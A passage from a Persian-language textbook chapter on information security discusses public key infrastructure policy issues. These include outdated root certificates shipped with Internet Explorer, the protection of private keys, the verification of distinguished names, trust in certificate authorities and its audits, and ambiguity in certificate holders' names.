‫ﻣﺤﺼﻮﻻﺕ ﻛﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺩﺭ ﺧﻮﺩ ﺩﺍﺷﺘﻨﺪ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻧﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺑﺎﻳـﺪ ﻭﺟـﻮﺩ ﻣـﻲﺩﺍﺷـﺖ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺑـﺴﺎﺩﮔﻲ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ‪ download‬ﻛﺮﺩ‪ ،‬ﺍﻣﺎ ﺑﺪﻟﻴﻞ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﺍﻭﻟﻴﻪ‪ ،‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻮﺻـﻴﻪ ﺷـﺪ ﻛـﻪ ﻛـﻞ‬
‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺑﻪ ﺁﻥ ﻭﺍﺑﺴﺘﻪ ﺑﻮﺩﻧﺪ ﻧﺎﮔﻬﺎﻥ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩ ﺑﻮﺩ ﻧﺎﺭﺍﺿﻲ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﭘﺲ ﺍﺯ ﺍﻳﻦ ﺗﺠﺮﺑﻪ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﺼﻤﻴﻤﻲ ﮔﺮﻓﺘﻨﺪ ﻛﻪ ﻣﻮﺟﺐ ﺷﺪ ﺍﺯ ﺳﻮﻳﻲ ﺩﻳﮕﺮ ﻣﺮﺗﻜﺐ ﺍﺷﺘﺒﺎﻩ ﺷﻮﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺷﺮﻭﻉ ﺑﻪ‬
‫ﺗﻮﺯﻳﻊ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺑﺎ ﺯﻣﺎﻧﻬﺎﻱ ﺍﻧﻘﻀﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﻛﺮﺩﻧﺪ‪ .‬ﺗﻤﺎﻡ ﮔﻮﺍﻫﻲﻫـﺎﻱ ﺗﻮﺯﻳـﻊﺷـﺪﻩ ﺑـﻪ ﻫﻤـﺮﺍﻩ ‪،Internet Explorer 5.0‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ ۱۰۲۴‬ﺑﻴﺘﻲ ‪ RSA‬ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻴﺶ ﺍﺯ ﻧﻴﻤﻲ ﺍﺯ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺗـﺎﺭﻳﺦ ﺍﻧﻘـﻀﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﻌـﺪ ﺍﺯ ‪ ۱‬ﮊﺍﻧﻮﻳـﻪ ‪۲۰۱۹‬‬
‫ﺩﺍﺭﻧﺪ‪ VeriSign .‬ﻧﻴﺰ ﻫﺸﺖ ﮔﻮﺍﻫﻲ ﺑﺎ ﺗﺎﺭﻳﺦ ﺍﻧﻘﻀﺎﻱ ﺳﺎﻝ ‪ ۲۰۲۸‬ﻫﻤﺮﺍﻩ ‪ Internet Explorer 5.5‬ﺗﻮﺯﻳﻊ ﻛﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻌﺘﻘﺪﻧﺪ ﻛﻪ ‪RSA‬ﻫﺎﻱ ‪ ۱۰۲۴‬ﺑﻴﺘﻲ ﺩﺭ ﺁﻥ ﺗﺎﺭﻳﺦ ﺩﻳﮕﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻤﻦ ﻣﺤﺴﻮﺏ ﻧﺨﻮﺍﻫﻨﺪ ﺷﺪ‪.‬‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﺧﻂ ﻣﺸﻲ ‪PKI‬‬
‫ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ ﮔﺴﺘﺮﺩﻩ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘﺬﻳﺮ ﺍﺳﺖ‪ .‬ﺗﻌﺪﺍﺩ ﺣﻮﺍﺩﺙ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ ﻭ ﻧﻴـﺎﺯ ﺑـﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺯﻳﺎﺩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻫﻤﻪ ‪ PKI‬ﮔﺴﺘﺮﺩﺓ ﺍﻣﺮﻭﺯ ﺑﻨﻈﺮ ﺩﻭﺭﺗﺮ ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ‪ ۱۹۹۰‬ﻣـﻲﺭﺳـﺪ‪.‬‬
‫ﻼ‬
‫ﺍﻳﻨﻜﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﺑﺮﺍﻱ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻮﺿﻮﻋﻲ ﻛﺎﻣ ﹰ‬
‫ﻲ ﺍﻧﺘﻬﺎﻱ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺼﺪﻳﻖ ﻧﺸﻮﺩ‪ ،‬ﻫﻤﻴﻦ ﻣﺘﺨﺼﺼﺎﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ‬
‫ﺟﺎ ﺍﻓﺘﺎﺩﻩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟ ﹺ‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺍﻳﻦ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺭﺩ ﺟﺰ ﺍﻳﻨﻜﻪ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﻧﻬﺎﻳـﺖ ﺳـﺎﺩﮔﻲ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻭ‬
‫ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺻﻔﺤﺔ ﺑﻌﺪ‪ ،‬ﺗﻌﺪﺍﺩ ﻣﻌﺪﻭﺩﻱ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺧﺘﻦ ‪ PKI‬ﻭﺍﻗﻌﻲ ﺑﺎﻳﺪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠﻪ ﺷﻮﺩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ‪ ،‬ﺧﻮﺩ ﻣﺮﺩﻡ ﻧﻴﺴﺘﻨﺪ‬
‫ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺭﺍ ﺗﺴﻬﻴﻞ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﺍﺛﺒﺎﺗﻲ ﺑﺮﺍﻱ ﻫﻮﻳﺘﻬﺎ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺼﻮﺭﺕ‬
‫ﺗﺼﺎﺩﻓﻲ ﺗﻮﻟﻴﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﺫﺧﻴﺮﻩ ﻧﺸﻮﺩ ﻛﻪ ﺗﻨﻬﺎ ﺑﺘﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻳﻜﻨﻔﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻛﻞ ﻳﮏ ﻓﺮﺁﻳﻨﺪ ﻣﻮﺭﺩ ﺗﺮﺩﻳﺪ ﻭﺍﻗﻊ ﻣﻲﮔـﺮﺩﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻢ ﺗﻮﻟﻴﺪ ﻭ ﻫﻢ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮ ﻧﻬﺎﻳﻲ ﺭﺍﻳﺎﻧﻪ ﺍﺳـﺖ‪ ،‬ﻭ ﻣـﻲﺩﺍﻧـﻴﻢ ﺑﻴـﺸﺘﺮ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ‪Netscape‬‬
‫‪ Navigator‬ﻳﺎ ‪ Internet Explorer‬ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ ﺍﻳﻤﻦ ﻧﻴـﺴﺘﻨﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺭﺍ ﻛـﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫‪146 Distinguished Name‬‬
‫‪٣٢٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪ download‬ﻛﺮﺩﻩﺍﻧﺪ ﺑﺪﻭﻥ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﺍﺯ ﻣﻨﺒﻊ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﻫـﺴﺘﻨﺪ‪ ،‬ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ download‬ﺷﺪﻩ ﺣﺎﻭﻱ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻣﻲﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺭﺍﻳﺞ ﺩﭼﺎﺭ ﺍﺷﻜﺎﻻﺕ ﺟﺪﻱ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﺻﺪﻫﺎ ﻭﺻﻠﺔ ﺍﻣﻨﻴﺘﻲ ﻃﻲ ﺳﺎﻟﻴﺎﻥ ﮔﺬﺷﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺻﺎﺩﺭ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﭘﺲ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣﺘـﺼﻞ ﺑـﻪ‬
‫ﺷﺒﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﻧﺰﺩﻳﻚ ﺑﻮﺳﻴﻠﺔ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩ ﺍﺯ ﻛﺎﺭﺗﺨﻮﺍﻧﻬﺎ ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺳﺮﻗﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻤﻲﺳﺎﺯﺩ‪.‬‬
‫ﺍﺳﺎﻣﻲ ﻣﻤﻴﺰﻩ‪ ،‬ﺧﻮﺩ ﻣﺮﺩﻡ ﻧﻴﺴﺘﻨﺪ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ‪ PKI‬ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ .‬ﺻﺤﺖ ﻭﺍﻗﻌﻲ ﻧﺎﻣﻲ ﻛﻪ ﺭﻭﻱ ﻗـﺴﻤﺖ "ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ" ﺁﻣـﺪﻩ ﺭﺍ‬
‫ﭼﮕﻮﻧﻪ ﺗﺸﺨﻴﺺ ﻣﻲﺩﻫﻴﺪ؟ ﻫﺮ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻌﻬﺪ ﻣﻲﻛﻨﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻛـﺴﻲ ﺭﺍ ﺗﺄﻳﻴـﺪ ﻣـﻲﻛﻨـﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺍﻋﻼﻡﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺧﻮﺩ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ‪ .‬ﺍﺯ ﻛﺠﺎ ﻣﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺁﻥ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﺍﺳـﻢ ﻣﻤﻴـﺰﺓ‬
‫ﺭﻭﻱ ﮔﻮﺍﻫﻲ ﻭﺍﻗﻌﹰﺎ ﻣﺘﻌﻠﻖ ﺑﻪ ﻓﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻣﺘﻌﻠﻖ ﺑﻪ ﺍﻭﺳﺖ؟‬
‫ﭼﮕﻮﻧﻪ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺼﻮﺻﻲ ﺑﺎﺷـﻨﺪ ﻳـﺎ ﺑـﺎﻟﻌﮑﺲ؟‬
‫ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺩﻭﻟﺘﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﻨﺎﻓﻌﺸﺎﻥ ﺍﻗﺘﻀﺎ ﻛﺮﺩﻩ ﭘﺎﺳﭙﻮﺭﺗﻬﺎﻱ ﺟﻌﻠﻲ ﻫﻢ ﺻﺎﺩﺭ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺁﻳﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻳـﻚ ﻣﺮﮐـﺰ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﻫﻢ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺯﻳﺮ ﭘﺎ ﺑﮕﺬﺍﺭﺩ ﻭ ﺍﺳﻨﺎﺩ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺎﻋﻼﻧﻪ ﺻﺎﺩﺭ ﻛﻨﺪ؟ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭼﮕﻮﻧﻪ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﮐـﺰ‬
‫ﺭﺍ ﺑﺎ ﻳﮏ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﻳﮕﺮ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺑﻌﻀﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﻣﺸﺘﺮﻱ‪ ،‬ﮔﻮﺍﻫﻴﻨﺎﻣـﻪﻫـﺎﻱ ﺷـﺨﺺ‬
‫ﺛﺎﻟﺜﻲ ﭼﻮﻥ ‪) ١٤٧SAS 70‬ﮔﺰﺍﺭﺵ ﻣﻤﻴﺰﻱ ﺧﺪﻣﺎﺕ(‪ ١٤٨‬ﻳﺎ ‪ WebTrust‬ﺑﺮﺍﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪) ١٤٩‬ﮔﺰﺍﺭﺵ ﺗﺼﺪﻳﻖ(‪ ١٥٠‬ﺭﺍ ﺍﺧﺬ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬
‫ﻛﻤﻴﺘﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺠﻤﻦ ﺑﺎﺭ ﺁﻣﺮﻳﻜﺎ‪ ١٥١‬ﻛﺘﺎﺑﻲ ﺑﻨﺎﻡ ﺧﻂ ﻣﺸﻲﻫﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ‪ ١٥٢PKI‬ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ‪ ،‬ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺪﻭﺩﻱ ﻣﻬـﺎﺭﺕ ﻭ‬
‫ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﻧﺮﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻲ ﺍﻋﺘﺒـﺎﺭ ﺣـﻞ‬
‫ﻲ ﺷﻨﺎﺳـﺎﻳ ﹺ‬
‫ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﺆﺍﻻﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﺠﺎﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻣﻤﻴﺰﻱﻫﺎ‪ ،‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺳﻤ ﹺ‬
‫ﺷﻮﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺧﻠﻖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻣﻘﺮﺭﺍﺕ ﻧﻴﺰ ﺑﻬﺮﻩ ﮔﺮﻓﺖ؛ ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ‪ ،‬ﺗﻼﺷﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﺎ ﺍﻣﺮﻭﺯ ﭼﻨﺪﺍﻥ ﺍﻣﻴﺪﺑﺨﺶ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‬
‫‪ ۱۴۷‬ﺳﻴﺎﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻤﻴﺰﻱ ﺷﻤﺎﺭﺓ ‪Statement on Auditing Standards) ۷۰‬؛ ‪ (SAS‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺧﺪﻣﺎﺗﻲ‪ ،‬ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺣﺴﺎﺑﺪﺍﺭﺍﻥ ﻋﻤﻮﻣﻲ ﮔﻮﺍﻫﻲﺷﺪﻩ ﺁﻣﺮﻳﻜﺎ )‪American Institute of Certified Public Accountants‬؛ ‪ (AICPA‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﻳـﻚ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫‪ SAS 70‬ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳﻚ ﻣﺆﺳﺴﻪ ﺧﺪﻣﺎﺗﻲ‪ ،‬ﺍﻫﺪﺍﻑ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺧﻮﺩ ﺭﺍ ﺗﻮﺳﻂ ﻳﻚ ﺷﺮﻛﺖ ﻣﺴﺘﻘﻞ ﺣﺴﺎﺑﺮﺳﻲ ﻭ ﻣﻤﻴﺰﻱ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺗﺄﻳﻴـﺪ ﺭﺳـﺎﻧﺪﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫‪148 Service Auditor Report‬‬
‫‪ ۱۴۹‬ﺗﺤﺖ ﮔﻮﺍﻫﻲ ‪ WebTrust‬ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﻳﻚ ﻣﻤﻴﺰ ﻭﺍﺟﺪ ﺷﺮﺍﻳﻂ ﻭ ﻣﺴﺘﻘﻞ‪ ،‬ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﺍﺻﻮﻝ ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳﺎ ﻳﻚ ﻣﺮﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻓﻌـﺎﻝ ﺍﺯ‬
‫ﺷﺮﺍﻳﻂ ﺣﺪﺍﻗﻞ ﺍﻓﺸﺎ‪ ،‬ﺧﻂ ﻣﺸﻲ‪ ،‬ﺗﺠﺮﺑﻴﺎﺕ‪ ،‬ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪.‬‬
‫‪150 Attestation Report‬‬
‫‪151 American Bar Association Information Security Committee‬‬
‫‪152 PKI Assessment Guidelines‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﺎ ﻳﻚ ﮔﻮﺍﻫﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻧﻮﺷﺘﻪ ﻣﺘﻌﻠﻖ ﺑﻪ "ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖ" ﺍﺳﺖ ﭼﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺍﺯ ﻛﺠﺎ ﻣﻲﻓﻬﻤﻴﺪ ﻣﺘﻌﻠﻖ ﺑﻪ ﻛﺪﺍﻡ ﺭﺍﺑﺮﺍﺕ ﺍﺳﻤﻴﺖ ﺍﺳﺖ؟‬
‫ﺭﻭﺷﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺑﻴﺶ ﺍﺯ ﺗﻨﻬﺎ ﻳﻚ ﻧﺎﻡ ﺍﺯ ﻓﺮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻳﻌﻨـﻲ ﺷـﺎﻣﻞ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﺣﻘﻮﻗﻲ ﻭ ﻳﻜﺘﺎﻱ ﻓﺮﺩ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ )ﻓﺮﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑﻪ ﮔﻮﺍﻫﻲ ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ( ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺗﻜﻤﻴﻠـﻲ ﺭﺍ‬
‫ﻧﺪﺍﻧﻴﺪ ‪ -‬ﻟﺬﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﻫﻨﻮﺯ ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺩﺍﺭﺍﻱ ﻗـﺴﻤﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ‬
